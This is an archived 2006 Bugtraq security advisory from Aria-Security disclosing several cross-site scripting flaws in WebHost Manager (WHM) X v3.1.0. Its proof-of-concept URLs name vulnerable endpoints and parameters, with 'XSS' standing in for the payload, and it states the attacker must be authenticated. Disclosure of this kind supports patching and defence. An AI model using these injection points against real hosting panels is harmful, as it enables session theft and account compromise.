lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20061124220550.21703.qmail@securityfocus.com> Date: 24 Nov 2006 22:05:50 -0000 From: Advisory@...a-security.net To: bugtraq@...urityfocus.com Subject: WebHost Manager (WHM) Multiple Cross-Site Scripting #Aria-Security Team Advisory #<www.Aria-security.Com For English > #<www.Aria-Security.net For Persian > #Original Advisory: #http://www.aria-security.com/forum/showthread.php?t=44 #----------------------------------------------------------- #Software: WebHost Manager (WHM) #Tested WHM X v3.1.0 (demo.cpanel.net) #Poc: # http://target:2086/scripts2/dochangeemail?user=demo&domain=demo.com&email=XSS http://target:2086/cgi/addon_configsupport.cgi?cgiaction=save&supportaddy=Domain.name&emailpipecmd=Domain.name&displaybrowserbody=1&displaybrowsersubject=1&displaydomainbody=1&displaydomainsubject=1&displayhostnamebody=1&displayhostnamesubject=1&displayipbody=1&displayipsubject=1&displayuserbody=1&displayusersubject=1&type=redirect&supporturl=XSS http://target:2086/scripts/editpkg?pkg=XSS http://target2086/scripts2/domts2?domain=XSS http://target:2086/scripts/editzone?domain=XSS http://target:2086/scripts2/dofeaturemanager?action=addfeature&feature=XSS http://target:2086/scripts/park?domain=demo.com&ndomain=XSS # #P.S : Attacker must be authenticated # #Contact: Advisory@...a-security.net